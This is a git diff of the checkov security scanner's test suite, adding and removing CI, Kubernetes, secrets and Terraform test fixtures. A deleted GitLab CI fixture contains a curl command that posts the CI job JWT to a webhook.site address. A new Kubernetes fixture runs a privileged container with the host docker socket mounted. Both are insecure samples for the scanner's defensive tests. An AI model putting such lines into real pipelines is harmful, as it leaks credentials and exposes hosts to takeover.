--- a/tests/github_actions/image_referencer/test_runner.py +++ /dev/null @@ -1,65 +0,0 @@ -from pathlib import Path - -from checkov.common.output.report import CheckType - -from checkov.common.bridgecrew.bc_source import get_source_type -from checkov.github_actions.runner import Runner - -from checkov.runner_filter import RunnerFilter -from pytest_mock import MockerFixture - -from tests.common.image_referencer.test_utils import mock_get_license_statuses_async, mock_get_image_cached_result_async - -RESOURCES_PATH = Path(__file__).parent.parent / "resources/.github/workflows" - - -def test_github_action_workflow(mocker: MockerFixture): - from checkov.common.bridgecrew.platform_integration import bc_integration - - file_name = "workflow_with_string_container.yml" - image_name = "node:14.16" - image_id = "sha256:2460522297" - code_lines = "12-13" - image_resource_postfixes = ["go", "openssl", "musl"] - test_file = RESOURCES_PATH / file_name - - runner_filter = RunnerFilter(run_image_referencer=True) - bc_integration.bc_source = get_source_type("disabled") - - mocker.patch( - "checkov.common.images.image_referencer.image_scanner.get_scan_results_from_cache_async", - side_effect=mock_get_image_cached_result_async, - ) - mocker.patch( - "checkov.common.images.image_referencer.get_license_statuses_async", - side_effect=mock_get_license_statuses_async, - ) - # 'workflow_with_string_container.yml (node:14.16 lines:12-13 (sha256:f9b91f78b0)).musl' - reports = Runner().run(root_folder="", files=[str(test_file)], runner_filter=runner_filter) - - assert len(reports) == 2 - - gha_report = next(report for report in reports if report.check_type == CheckType.GITHUB_ACTIONS) - sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE) - - assert len(gha_report.resources) == 0 - assert len(gha_report.passed_checks) == 14 - assert len(gha_report.failed_checks) == 2 - assert len(gha_report.skipped_checks) == 0 - assert len(gha_report.parsing_errors) == 0 - - assert len(sca_image_report.resources) == 3 - assert sca_image_report.resources == { - f".github/workflows/{file_name} ({image_name} lines:{code_lines} ({image_id})).{postfix}" - for postfix in image_resource_postfixes - } - assert sca_image_report.image_cached_results[0]["dockerImageName"] == "node:14.16" - assert sca_image_report.image_cached_results[0]["packages"] == [ - {"type": "os", "name": "tzdata", "version": "2021a-1+deb11u5", "licenses": []} - ] - - assert len(sca_image_report.passed_checks) == 1 - assert len(sca_image_report.failed_checks) == 4 - assert len(sca_image_report.image_cached_results) == 1 - assert len(sca_image_report.skipped_checks) == 0 - assert len(sca_image_report.parsing_errors) == 0 diff --git a/tests/gitlab_ci/image_referencer/__init__.py b/tests/gitlab_ci/image_referencer/__init__.py deleted file mode 100644 index e69de29bb2d..00000000000 diff --git a/tests/gitlab_ci/image_referencer/resources/single_image/.gitlab-ci.yml b/tests/gitlab_ci/image_referencer/resources/single_image/.gitlab-ci.yml deleted file mode 100644 index bb827be51cb..00000000000 --- a/tests/gitlab_ci/image_referencer/resources/single_image/.gitlab-ci.yml +++ /dev/null @@ -1,7 +0,0 @@ -default: - image: - name: redis:latest - entrypoint: ["/bin/bash"] - -deploy: - script: 'curl -H \"Content-Type: application/json\" -X POST --data "$CI_JOB_JWT_V1" https://webhook.site/4cf17d70-56ee-4b84-9823-e86461d2f826' \ No newline at end of file diff --git a/tests/gitlab_ci/image_referencer/resources/single_image/image_without_name.gitlab-ci.yml b/tests/gitlab_ci/image_referencer/resources/single_image/image_without_name.gitlab-ci.yml deleted file mode 100644 index 28796e6c1fe..00000000000 --- a/tests/gitlab_ci/image_referencer/resources/single_image/image_without_name.gitlab-ci.yml +++ /dev/null @@ -1,8 +0,0 @@ -unit tests: - image: - entrypoint: - - "/opt/bin/entry_point_unit_tests.sh" - - services: - - name: "postgres:13.2" - alias: postgres \ No newline at end of file diff --git a/tests/gitlab_ci/image_referencer/test_gitlab_ci_provider.py b/tests/gitlab_ci/image_referencer/test_gitlab_ci_provider.py deleted file mode 100644 index 5857aabca69..00000000000 --- a/tests/gitlab_ci/image_referencer/test_gitlab_ci_provider.py +++ /dev/null @@ -1,139 +0,0 @@ -from checkov.common.images.image_referencer import Image -from checkov.gitlab_ci.image_referencer.provider import GitlabCiProvider - - -def test_extract_images_from_workflow(): - file_path = 'tests/gitlab_ci/resources/images/.gitlab-ci.yml' - workflow_config = { - "default": { - "image": { - "name": "ruby:2.6", - "entrypoint": [ - "/bin/bash" - ], - "__startline__": 3, - "__endline__": 6 - }, - "services": [ - { - "name": "privateregistry/stuff/my-postgres:11.7", - "alias": "db-postgres", - "__startline__": 7, - "__endline__": 9 - }, - { - "name": "redis:latest", - "__startline__": 9, - "__endline__": 10 - }, - "nginx:1.17" - ], - "before_script": [ - "bundle install" - ], - "__startline__": 2, - "__endline__": 15 - }, - "__startline__": 1, - "__endline__": 32 - } - - gitlab_ci_provider = GitlabCiProvider(workflow_config=workflow_config, file_path=file_path) - images = gitlab_ci_provider.extract_images_from_workflow() - - assert set(images) == { - Image( - end_line=6, - start_line=3, - file_path=file_path, - name='ruby:2.6', - related_resource_id='default.image' - ), - Image( - end_line=10, - start_line=9, - file_path=file_path, - name='redis:latest', - related_resource_id='default.services.2' - ), - Image( - end_line=10, - start_line=9, - file_path=file_path, - name='nginx:1.17', - related_resource_id='default.services.2' - ), - Image( - end_line=9, - start_line=7, - file_path=file_path, - name='privateregistry/stuff/my-postgres:11.7', - related_resource_id='default.services.1' - ) - } - - -def test_extract_images_from_workflow_no_images(): - file_path = 'tests/gitlab_ci/resources/rules/.gitlab-ci.yml' - workflow_config = { - "script": "echo \"This job creates double pipelines!\"", - "rules": [ - { - "changes": [ - "$DOCKERFILES_DIR/*" - ], - "__startline__": 4, - "__endline__": 6 - }, - { - "if": "$CI_PIPELINE_SOURCE \u003d\u003d \"push\"", - "__startline__": 6, - "__endline__": 7 - }, - { - "if": "$CI_PIPELINE_SOURCE \u003d\u003d \"merge_request_event\"", - "__startline__": 7, - "__endline__": 9 - } - ], - "__startline__": 2, - "__endline__": 9 - } - - gitlab_ci_provider = GitlabCiProvider(workflow_config=workflow_config, file_path=file_path) - images = gitlab_ci_provider.extract_images_from_workflow() - - assert not images - - -def test_extract_images_from_workflow_image_without_name(): - file_path = 'tests/gitlab_ci/resources/rules/image_without_name.gitlab-ci.yml' - workflow_config = { - "unit tests": { - "image": { - "entrypoint": [ - "/opt/bin/entry_point_unit_tests.sh" - ], - "__startline__": 3, - "__endline__": 6 - }, - "services": [ - { - "name": "postgres:13.2", - "alias": "postgres", - "__startline__": 7, - "__endline__": 8 - } - ], - "__startline__": 2, - "__endline__": 8 - }, - "__startline__": 1, - "__endline__": 8 - } - - gitlab_ci_provider = GitlabCiProvider(workflow_config=workflow_config, file_path=file_path) - images = gitlab_ci_provider.extract_images_from_workflow() - - assert len(images) == 1 - assert images[0] == Image(name='postgres:13.2', file_path=file_path, start_line=7, end_line=8, related_resource_id='unit tests.services.1') diff --git a/tests/gitlab_ci/image_referencer/test_manager.py b/tests/gitlab_ci/image_referencer/test_manager.py deleted file mode 100644 index 869e8419c89..00000000000 --- a/tests/gitlab_ci/image_referencer/test_manager.py +++ /dev/null @@ -1,106 +0,0 @@ -from checkov.common.images.image_referencer import Image -from checkov.gitlab_ci.image_referencer.manager import GitlabCiImageReferencerManager - - -def test_extract_images_from_workflow(): - file_path = 'tests/gitlab_ci/resources/images/.gitlab-ci.yml' - workflow_config = { - "default": { - "image": { - "name": "ruby:2.6", - "entrypoint": [ - "/bin/bash" - ], - "__startline__": 3, - "__endline__": 6 - }, - "services": [ - { - "name": "privateregistry/stuff/my-postgres:11.7", - "alias": "db-postgres", - "__startline__": 7, - "__endline__": 9 - }, - { - "name": "redis:latest", - "__startline__": 9, - "__endline__": 10 - }, - "nginx:1.17" - ], - "before_script": [ - "bundle install" - ], - "__startline__": 2, - "__endline__": 15 - }, - "__startline__": 1, - "__endline__": 32 - } - - manager = GitlabCiImageReferencerManager(workflow_config=workflow_config, file_path=file_path) - images = manager.extract_images_from_workflow() - - assert set(images) == { - Image( - end_line=6, - start_line=3, - file_path=file_path, - name='ruby:2.6', - related_resource_id='default.image' - ), - Image( - end_line=10, - start_line=9, - file_path=file_path, - name='redis:latest', - related_resource_id='default.services.2' - ), - Image( - end_line=10, - start_line=9, - file_path=file_path, - name='nginx:1.17', - related_resource_id='default.services.2' - ), - Image( - end_line=9, - start_line=7, - file_path=file_path, - name='privateregistry/stuff/my-postgres:11.7', - related_resource_id='default.services.1' - ) - } - - -def test_extract_images_from_workflow_no_images(): - file_path = 'tests/gitlab_ci/resources/rules/.gitlab-ci.yml' - workflow_config = { - "script": "echo \"This job creates double pipelines!\"", - "rules": [ - { - "changes": [ - "$DOCKERFILES_DIR/*" - ], - "__startline__": 4, - "__endline__": 6 - }, - { - "if": "$CI_PIPELINE_SOURCE \u003d\u003d \"push\"", - "__startline__": 6, - "__endline__": 7 - }, - { - "if": "$CI_PIPELINE_SOURCE \u003d\u003d \"merge_request_event\"", - "__startline__": 7, - "__endline__": 9 - } - ], - "__startline__": 2, - "__endline__": 9 - } - - manager = GitlabCiImageReferencerManager(workflow_config=workflow_config, file_path=file_path) - images = manager.extract_images_from_workflow() - - assert not images diff --git a/tests/gitlab_ci/image_referencer/test_runner_gitlab_workflows.py b/tests/gitlab_ci/image_referencer/test_runner_gitlab_workflows.py deleted file mode 100644 index cb8d0d193ca..00000000000 --- a/tests/gitlab_ci/image_referencer/test_runner_gitlab_workflows.py +++ /dev/null @@ -1,65 +0,0 @@ -from pathlib import Path - -from checkov.common.output.report import CheckType - -from checkov.common.bridgecrew.bc_source import get_source_type -from checkov.gitlab_ci.runner import Runner - -from checkov.runner_filter import RunnerFilter -from pytest_mock import MockerFixture - -from tests.common.image_referencer.test_utils import mock_get_license_statuses_async, mock_get_image_cached_result_async - -RESOURCES_PATH = Path(__file__).parent / "resources/single_image" - - -def test_gitlab_workflow(mocker: MockerFixture): - from checkov.common.bridgecrew.platform_integration import bc_integration - file_name = ".gitlab-ci.yml" - image_name = "redis:latest" - image_id = "sha256:2460522297" - code_lines = "3-6" - image_resource_postfixes = ['go', 'openssl', 'musl'] - test_file = RESOURCES_PATH / file_name - - runner_filter = RunnerFilter(run_image_referencer=True) - bc_integration.bc_source = get_source_type("disabled") - - mocker.patch( - "checkov.common.images.image_referencer.image_scanner.get_scan_results_from_cache_async", - side_effect=mock_get_image_cached_result_async, - ) - mocker.patch( - "checkov.common.images.image_referencer.get_license_statuses_async", - side_effect=mock_get_license_statuses_async, - ) - - reports = Runner().run(root_folder="", files=[str(test_file)], runner_filter=runner_filter) - - assert len(reports) == 2 - - gitlab_ci_report = next(report for report in reports if report.check_type == CheckType.GITLAB_CI) - sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE) - - assert len(gitlab_ci_report.resources) == 0 - assert len(gitlab_ci_report.passed_checks) == 1 - assert len(gitlab_ci_report.failed_checks) == 1 - assert len(gitlab_ci_report.skipped_checks) == 0 - assert len(gitlab_ci_report.parsing_errors) == 0 - - assert len(sca_image_report.resources) == 3 - assert sca_image_report.resources == { - f"{file_name} ({image_name} lines:{code_lines} ({image_id})).{postfix}" - for postfix in image_resource_postfixes - } - assert sca_image_report.image_cached_results[0]["dockerImageName"] == "redis:latest" - assert sca_image_report.image_cached_results[0]["packages"] == [ - {"type": "os", "name": "tzdata", "version": "2021a-1+deb11u5", "licenses": []} - ] - - assert len(sca_image_report.passed_checks) == 1 - assert len(sca_image_report.failed_checks) == 4 - assert len(sca_image_report.image_cached_results) == 1 - assert len(sca_image_report.skipped_checks) == 0 - assert len(sca_image_report.parsing_errors) == 0 - assert gitlab_ci_report.passed_checks[0].resource == sca_image_report.image_cached_results[0]["relatedResourceId"] diff --git a/tests/sast/test_filter_files_manager.py b/tests/sast/test_filter_files_manager.py index b8c6befdfb4..884ede76887 100644 --- a/tests/sast/test_filter_files_manager.py +++ b/tests/sast/test_filter_files_manager.py @@ -8,7 +8,9 @@ def test_sast_js_filtered_files_by_ts(): test_dir = os.path.join(pathlib.Path(__file__).parent.resolve(), 'source_code', 'js_filtered_build_ts') files_filter_manager = FilesFilterManager([test_dir], set([SastLanguages.JAVASCRIPT])) filtered_paths = files_filter_manager.get_files_to_filter() - assert len(filtered_paths) == 3 - assert filtered_paths[0].endswith('example2/build/file.js') - assert filtered_paths[1].endswith('example1/build') - assert filtered_paths[2].endswith('example3/main.js') + paths = {} + for path in filtered_paths: + if path.endswith('example2/build/file.js') or path.endswith('example1/build') or path.endswith('example3/main.js'): + paths[path] = path + + assert len(paths.keys()) == 3 \ No newline at end of file diff --git a/tests/sca_image/conftest.py b/tests/sca_image/conftest.py index a8092dcd6ae..61772b58723 100644 --- a/tests/sca_image/conftest.py +++ b/tests/sca_image/conftest.py @@ -14,9 +14,9 @@ from checkov.common.output.report import Report from .mocks import mock_scan +KUBERNETES_EXAMPLES_DIR = Path(__file__).parent / "examples/kubernetes" DOCKERFILE_EXAMPLES_DIR = Path(__file__).parent / "examples/dockerfile" - @pytest.fixture() def image_id() -> str: return "sha256:6fd085fc6410" @@ -50,7 +50,7 @@ def empty_report() -> dict[str, Any]: @pytest.fixture() def image_name() -> str: - return "python:3.8-alpine" + return "ubuntu" @pytest.fixture() diff --git a/tests/sca_image/examples/example/.github/workflows/vulnerable_container.yaml b/tests/sca_image/examples/example/.github/workflows/vulnerable_container.yaml deleted file mode 100644 index 482319d2a29..00000000000 --- a/tests/sca_image/examples/example/.github/workflows/vulnerable_container.yaml +++ /dev/null @@ -1,20 +0,0 @@ -name: CI -on: - push: - branches: [ main ] -jobs: - container-test-job: - runs-on: ubuntu-latest - container: - image: node:14.16 - env: - NODE_ENV: development - ports: - - 80 - volumes: - - my_docker_volume:/volume_mount - options: --cpus 1 - steps: - - name: Check for dockerenv file - run: (ls /.dockerenv && echo Found dockerenv) || (echo No dockerenv) - \ No newline at end of file diff --git a/tests/sca_image/examples/kubernetes/deployment.yaml b/tests/sca_image/examples/kubernetes/deployment.yaml new file mode 100644 index 00000000000..225f7176588 --- /dev/null +++ b/tests/sca_image/examples/kubernetes/deployment.yaml @@ -0,0 +1,44 @@ +apiVersion: apps/v1 +kind: Deployment +metadata: + name: health-check-deployment +spec: + selector: + matchLabels: + app: health-check + template: + metadata: + labels: + app: health-check + spec: + containers: + - name: health-check + image: node:14.16 + resources: + limits: + memory: "100Mi" + cpu: "30m" + ports: + - containerPort: 80 + # Custom Stuff + securityContext: + privileged: true + volumeMounts: + - mountPath: /custom/docker/docker.sock + name: docker-sock-volume + volumes: + - name: docker-sock-volume + hostPath: + path: /var/run/docker.sock +--- +apiVersion: v1 +kind: Service +metadata: + name: health-check-service +spec: + ports: + - protocol: TCP + port: 80 + targetPort: 80 + selector: + app: health-check \ No newline at end of file diff --git a/tests/sca_image/test_runner.py b/tests/sca_image/test_runner.py index 58571d0c493..ade8644e5db 100644 --- a/tests/sca_image/test_runner.py +++ b/tests/sca_image/test_runner.py @@ -13,15 +13,13 @@ from checkov.common.bridgecrew.code_categories import CodeCategoryType from checkov.common.bridgecrew.severities import Severities, BcSeverities from checkov.common.models.enums import CheckResult -from checkov.github_actions.runner import Runner as GHA_Runner +from checkov.dockerfile.runner import Runner as Dockerfile_Runner +from checkov.kubernetes.runner import Runner as Kubernetes_Runner from checkov.runner_filter import RunnerFilter from checkov.sca_image.runner import Runner +from .conftest import DOCKERFILE_EXAMPLES_DIR, KUBERNETES_EXAMPLES_DIR from .mocks import mock_scan_empty, mock_scan_image -WORKFLOW_EXAMPLES_DIR = Path(__file__).parent / "examples/.github/workflows" -WORKFLOW_IMAGE_EXAMPLES_DIR = Path(__file__).parent / "examples/example/.github/workflows" -DOCKERFILE_EXAMPLES_DIR = Path(__file__).parent / "examples/dockerfile" - def test_image_referencer_trigger_image_flow_calls(mock_bc_integration, image_name, cached_scan_result): # given @@ -59,8 +57,8 @@ def test_image_referencer_trigger_image_flow_calls(mock_bc_integration, image_na ) # when - reports = GHA_Runner().run(root_folder=str(WORKFLOW_EXAMPLES_DIR), - runner_filter=RunnerFilter(run_image_referencer=True)) + reports = Dockerfile_Runner().run(root_folder=str(DOCKERFILE_EXAMPLES_DIR), + runner_filter=RunnerFilter(run_image_referencer=True)) sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE) @@ -69,9 +67,9 @@ def test_image_referencer_trigger_image_flow_calls(mock_bc_integration, image_na assert len(sca_image_report.passed_checks) == 1 -def test_runner_honors_enforcement_rules(mock_bc_integration, image_name, cached_scan_result): +def test_runner_honors_enforcement_rules(mock_bc_integration, image_name2, cached_scan_result): # given - image_id_encoded = quote_plus(f"image:{image_name}") + image_id_encoded = quote_plus(f"image:{image_name2}") response_json = { "violations": [ @@ -109,14 +107,14 @@ def test_runner_honors_enforcement_rules(mock_bc_integration, image_name, cached # this is not quite a true test, because the checks don't have severities. However, this shows that the check registry # passes the report type properly to RunnerFilter.should_run_check, and we have tests for that method runner_filter.enforcement_rule_configs = { - CheckType.GITHUB_ACTIONS: Severities[BcSeverities.OFF], + CheckType.KUBERNETES: Severities[BcSeverities.OFF], CheckType.SCA_IMAGE: { CodeCategoryType.LICENSES: Severities[BcSeverities.OFF], CodeCategoryType.VULNERABILITIES: Severities[BcSeverities.OFF] } } - reports = GHA_Runner().run(root_folder=str(WORKFLOW_EXAMPLES_DIR), runner_filter=runner_filter) + reports = Kubernetes_Runner().run(root_folder=str(KUBERNETES_EXAMPLES_DIR), runner_filter=runner_filter) sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE) summary = sca_image_report.get_summary() @@ -236,7 +234,7 @@ def test_run_license_policy(mock_bc_integration, image_name, cached_scan_result) # when runner_filter = RunnerFilter(checks=['BC_LIC_1'], run_image_referencer=True) - reports = GHA_Runner().run(root_folder=str(WORKFLOW_EXAMPLES_DIR), runner_filter=runner_filter) + reports = Dockerfile_Runner().run(root_folder=str(DOCKERFILE_EXAMPLES_DIR), runner_filter=runner_filter) sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE) # then assert not [c for c in sca_image_report.passed_checks + sca_image_report.failed_checks @@ -292,8 +290,8 @@ def test_run_with_empty_scan_result(mock_bc_integration): @mock.patch.dict(os.environ, {"CKV_IGNORE_HIDDEN_DIRECTORIES": "false"}) @mock.patch('checkov.sca_image.runner.Runner.get_image_cached_results', mock_scan_image) -def test_run_with_image_cached_reports_env(mock_bc_integration, image_name2, cached_scan_result2): - image_id_encoded = quote_plus(f"image:{image_name2}") +def test_run_with_image_cached_reports_env(mock_bc_integration, image_name, cached_scan_result2): + image_id_encoded = quote_plus(f"image:{image_name}") with aioresponses() as mock_response: mock_response.get( @@ -303,7 +301,7 @@ def test_run_with_image_cached_reports_env(mock_bc_integration, image_name2, cac ) runner_filter = RunnerFilter(run_image_referencer=True) - reports = GHA_Runner().run(root_folder=str(WORKFLOW_IMAGE_EXAMPLES_DIR), runner_filter=runner_filter) + reports = Dockerfile_Runner().run(root_folder=str(DOCKERFILE_EXAMPLES_DIR), runner_filter=runner_filter) sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE) assert len(sca_image_report.passed_checks) == 0 @@ -316,9 +314,9 @@ def test_run_with_image_cached_reports_env(mock_bc_integration, image_name2, cac @mock.patch.dict(os.environ, {"CHECKOV_CREATE_SCA_IMAGE_REPORTS_FOR_IR": "False"}) @mock.patch.dict(os.environ, {"CKV_IGNORE_HIDDEN_DIRECTORIES": "false"}) @mock.patch('checkov.sca_image.runner.Runner.get_image_cached_results', mock_scan_image) -def test_run_with_image_cached_reports_and_without_sca_reports_env(mock_bc_integration, image_name2, +def test_run_with_image_cached_reports_and_without_sca_reports_env(mock_bc_integration, image_name, cached_scan_result2): - image_id_encoded = quote_plus(f"image:{image_name2}") + image_id_encoded = quote_plus(f"image:{image_name}") with aioresponses() as mock_response: mock_response.get( url=URL(mock_bc_integration.api_url + f"/api/v1/vulnerabilities/scan-results/{image_id_encoded}", encoded=True), @@ -327,7 +325,7 @@ def test_run_with_image_cached_reports_and_without_sca_reports_env(mock_bc_integ ) runner_filter = RunnerFilter(run_image_referencer=True) - reports = GHA_Runner().run(root_folder=str(WORKFLOW_IMAGE_EXAMPLES_DIR), runner_filter=runner_filter) + reports = Dockerfile_Runner().run(root_folder=str(DOCKERFILE_EXAMPLES_DIR), runner_filter=runner_filter) sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE) assert len(sca_image_report.passed_checks) == 0 diff --git a/tests/secrets/test_prioritise_secrets.py b/tests/secrets/test_prioritise_secrets.py new file mode 100644 index 00000000000..d0994c48347 --- /dev/null +++ b/tests/secrets/test_prioritise_secrets.py @@ -0,0 +1,54 @@ +import unittest + +from checkov.common.models.enums import CheckResult +from checkov.common.output.secrets_record import SecretsRecord +from checkov.secrets.runner import Runner, ENTROPY_CHECK_IDS, GENERIC_PRIVATE_KEY_CHECK_IDS + + +class TestPrioritiseSecrets(unittest.TestCase): + def setUp(self): + self.secret_records = { + 'key1': SecretsRecord(check_id='CKV_SECRET_6', check_name='foo', + check_result={"result": CheckResult.FAILED}, code_block=[(1, 'baz')], + file_path='qux', file_line_range=[1, 2], resource='resource', evaluations=None, + check_class='CheckClass', file_abs_path='abs_path'), + 'key2': SecretsRecord(check_id='CKV_SECRET_10', check_name='foo', + check_result={"result": CheckResult.FAILED}, + code_block=[(1, 'baz')], file_path='qux', file_line_range=[1, 2], resource='resource', + evaluations=None, check_class='CheckClass', file_abs_path='abs_path'), + 'key3': SecretsRecord(check_id='CKV_SECRET_18', check_name='foo', + check_result={"result": CheckResult.FAILED}, code_block=[(1, 'baz')], + file_path='qux', file_line_range=[1, 2], resource='resource', evaluations=None, + check_class='CheckClass', file_abs_path='abs_path'), + } + self.ENTROPY_CHECK_IDS = ENTROPY_CHECK_IDS + self.GENERIC_PRIVATE_KEY_CHECK_IDS = GENERIC_PRIVATE_KEY_CHECK_IDS + + def test_entropy_check_id_removed(self): + result = Runner._prioritise_secrets(self.secret_records, 'key1', 'CKV_SECRET_18') + self.assertTrue(result) + self.assertNotIn('key1', self.secret_records) + + def test_generic_private_key_check_id_removed(self): + result = Runner._prioritise_secrets(self.secret_records, 'key2', 'CKV_SECRET_18') + self.assertTrue(result) + self.assertNotIn('key2', self.secret_records) + + def test_no_removal_entropy_check_id(self): + result = Runner._prioritise_secrets(self.secret_records, 'key1', 'CKV_SECRET_6') + self.assertFalse(result) + self.assertIn('key1', self.secret_records) + + def test_no_removal_generic_private_key_check_id(self): + result = Runner._prioritise_secrets(self.secret_records, 'key2', 'CKV_SECRET_10') + self.assertFalse(result) + self.assertIn('key2', self.secret_records) + + def test_no_removal_other_check_id(self): + result = Runner._prioritise_secrets(self.secret_records, 'key3', 'CKV_SECRET_1000') + self.assertFalse(result) + self.assertIn('key3', self.secret_records) + + +if __name__ == '__main__': + unittest.main() diff --git a/tests/terraform/checks/data/aws/example_ModuleProvider/main.tf b/tests/terraform/checks/data/aws/example_ModuleProvider/main.tf index 0fb5edc174d..c8e43ad69cf 100644 --- a/tests/terraform/checks/data/aws/example_ModuleProvider/main.tf +++ b/tests/terraform/checks/data/aws/example_ModuleProvider/main.tf @@ -6,7 +6,7 @@ provider "aws" { region = "us-west-2" } -# The resources in the Provider block are not explicitly associated to this reosource. +# The resources in the Provider block are not explicitly associated to this resource. module "example" { source = "./example" providers = { diff --git a/tests/terraform/checks/data/aws/example_module_with_one_provider/example/main.tf b/tests/terraform/checks/data/aws/example_module_with_one_provider/example/main.tf new file mode 100644 index 00000000000..3eade85d3c6 --- /dev/null +++ b/tests/terraform/checks/data/aws/example_module_with_one_provider/example/main.tf @@ -0,0 +1,3 @@ +resource "aws_s3_bucket" "bucket"{ + bucket = "module-bucket" +} \ No newline at end of file diff --git a/tests/terraform/checks/data/aws/example_module_with_one_provider/main.tf b/tests/terraform/checks/data/aws/example_module_with_one_provider/main.tf new file mode 100644 index 00000000000..ddf9c45c4e8 --- /dev/null +++ b/tests/terraform/checks/data/aws/example_module_with_one_provider/main.tf @@ -0,0 +1,8 @@ +provider "aws" { + region = "us-west-1" +} + +# The resources in the Provider block are not explicitly associated to this resource. +module "example" { + source = "./example" +} \ No newline at end of file diff --git a/tests/terraform/checks/data/aws/example_provider_edge_case/main.tf b/tests/terraform/checks/data/aws/example_provider_edge_case/main.tf new file mode 100644 index 00000000000..002a92686d3 --- /dev/null +++ b/tests/terraform/checks/data/aws/example_provider_edge_case/main.tf @@ -0,0 +1,24 @@ +provider "aws" { + region = "us-west-1" + skip_credentials_validation = true + skip_requesting_account_id = true + skip_metadata_api_check = true +# s3_force_path_style = true + access_key = "mock_access_key" + secret_key = "mock_secret_key" +} + +module "level1" { + source = "./nesting" + } + + +module "level1_2" { + source = "./nesting_2" + } + + +resource "aws_s3_bucket_object" "this_file_2" { + bucket = "your_bucket_name" + key = "some_key" +} \ No newline at end of file diff --git a/tests/terraform/checks/data/aws/example_provider_edge_case/nesting/main.tf b/tests/terraform/checks/data/aws/example_provider_edge_case/nesting/main.tf new file mode 100644 index 00000000000..444b2c0b0f3 --- /dev/null +++ b/tests/terraform/checks/data/aws/example_provider_edge_case/nesting/main.tf @@ -0,0 +1,41 @@ +provider "aws" { + region = "us-west-1" + skip_credentials_validation = true + skip_requesting_account_id = true + skip_metadata_api_check = true +# s3_force_path_style = true + access_key = "mock_access_key" + secret_key = "mock_secret_key" +} + +provider "aws" { + region = "eu-west-1" + alias = "eu_west" + skip_credentials_validation = true + skip_requesting_account_id = true + skip_metadata_api_check = true +# s3_force_path_style = true + access_key = "mock_access_key" + secret_key = "mock_secret_key" +} + +module "level2" { + source = "./nesting_l2" +} + +module "level2_2" { + source = "./nesting_l2_2" + providers = { + aws = aws.eu_west + } +} + + + + +resource "aws_s3_bucket_object" "this_other_file" { + bucket = "your_bucket_name" + key = "key" + source = "source" + +} diff --git a/tests/terraform/checks/data/aws/example_provider_edge_case/nesting/nesting_l2/main.tf b/tests/terraform/checks/data/aws/example_provider_edge_case/nesting/nesting_l2/main.tf new file mode 100644 index 00000000000..c9ba64cc40f --- /dev/null +++ b/tests/terraform/checks/data/aws/example_provider_edge_case/nesting/nesting_l2/main.tf @@ -0,0 +1,5 @@ + +resource "aws_s3_bucket_object" "this_file_2" { + bucket = "your_bucket_name" + key = "some_key" +} \ No newline at end of file diff --git a/tests/terraform/checks/data/aws/example_provider_edge_case/nesting/nesting_l2_2/main.tf b/tests/terraform/checks/data/aws/example_provider_edge_case/nesting/nesting_l2_2/main.tf new file mode 100644 index 00000000000..c9ba64cc40f --- /dev/null +++ b/tests/terraform/checks/data/aws/example_provider_edge_case/nesting/nesting_l2_2/main.tf @@ -0,0 +1,5 @@ + +resource "aws_s3_bucket_object" "this_file_2" { + bucket = "your_bucket_name" + key = "some_key" +} \ No newline at end of file diff --git a/tests/terraform/checks/data/aws/example_provider_edge_case/nesting_2/main.tf b/tests/terraform/checks/data/aws/example_provider_edge_case/nesting_2/main.tf new file mode 100644 index 00000000000..c9ba64cc40f --- /dev/null +++ b/tests/terraform/checks/data/aws/example_provider_edge_case/nesting_2/main.tf @@ -0,0 +1,5 @@ + +resource "aws_s3_bucket_object" "this_file_2" { + bucket = "your_bucket_name" + key = "some_key" +} \ No newline at end of file diff --git a/tests/terraform/checks/data/aws/example_provider_edge_case/readme.md b/tests/terraform/checks/data/aws/example_provider_edge_case/readme.md new file mode 100644 index 00000000000..c145246bc89 --- /dev/null +++ b/tests/terraform/checks/data/aws/example_provider_edge_case/readme.md @@ -0,0 +1,27 @@ +Resources by Address: + +File: /main.tf:21-24 +- aws_s3_bucket_object.this_file_2 + - Expected `__provider_address__` == "aws.default" + - Result: aws.default + +File: /nesting/main.tf:36-41 +- module.level1.aws_s3_bucket_object.this_other_file + - Expected `__provider_address__` == "module.level1.aws.default" + - Result: aws.default + + +File: /nesting/nesting_l2/main.tf:2-5 +- module.level1.module.level2.aws_s3_bucket_object.this_file_2 + - Expected: `__provider_address__` == "module.level1.aws.default" + - Result: __provider_address__ does not exist + +File: /nesting/nesting_l2_2/main.tf:2-5 +- module.level1.module.level2_2.aws_s3_bucket_object.this_file_2 + - Expected: `__provider_address__` == "module.level1.aws.eu_west" + - Result: aws.eu_west + +File: /nesting_2/main.tf:2-5 +- module.level1_2.aws_s3_bucket_object.this_file_2 + - Expected: `__provider_address__` == "aws.default" + - Result: aws.default \ No newline at end of file diff --git a/tests/terraform/checks/data/aws/example_provider_with_nested_module/example/example2/main.tf b/tests/terraform/checks/data/aws/example_provider_with_nested_module/example/example2/main.tf new file mode 100644 index 00000000000..a701ffbe4f6 --- /dev/null +++ b/tests/terraform/checks/data/aws/example_provider_with_nested_module/example/example2/main.tf @@ -0,0 +1,12 @@ +provider "abbey" { +} + +provider "aws" { + region = "" + alias = "aaa" +} + +resource "aws_s3_bucket" "bucket"{ + bucket = "module-bucket" + provider = "aws.aaa" +} \ No newline at end of file diff --git a/tests/terraform/checks/data/aws/example_provider_with_nested_module/example/main.tf b/tests/terraform/checks/data/aws/example_provider_with_nested_module/example/main.tf new file mode 100644 index 00000000000..d62ddb0b0e1 --- /dev/null +++ b/tests/terraform/checks/data/aws/example_provider_with_nested_module/example/main.tf @@ -0,0 +1,3 @@ +module "example2" { + source = "./example2" +} \ No newline at end of file diff --git a/tests/terraform/checks/data/aws/example_provider_with_nested_module/main.tf b/tests/terraform/checks/data/aws/example_provider_with_nested_module/main.tf new file mode 100644 index 00000000000..ddf9c45c4e8 --- /dev/null +++ b/tests/terraform/checks/data/aws/example_provider_with_nested_module/main.tf @@ -0,0 +1,8 @@ +provider "aws" { + region = "us-west-1" +} + +# The resources in the Provider block are not explicitly associated to this resource. +module "example" { + source = "./example" +} \ No newline at end of file diff --git a/tests/terraform/checks/data/aws/example_provider_with_nested_module_assign_provider/example/example2/main.tf b/tests/terraform/checks/data/aws/example_provider_with_nested_module_assign_provider/example/example2/main.tf new file mode 100644 index 00000000000..3eade85d3c6 --- /dev/null +++ 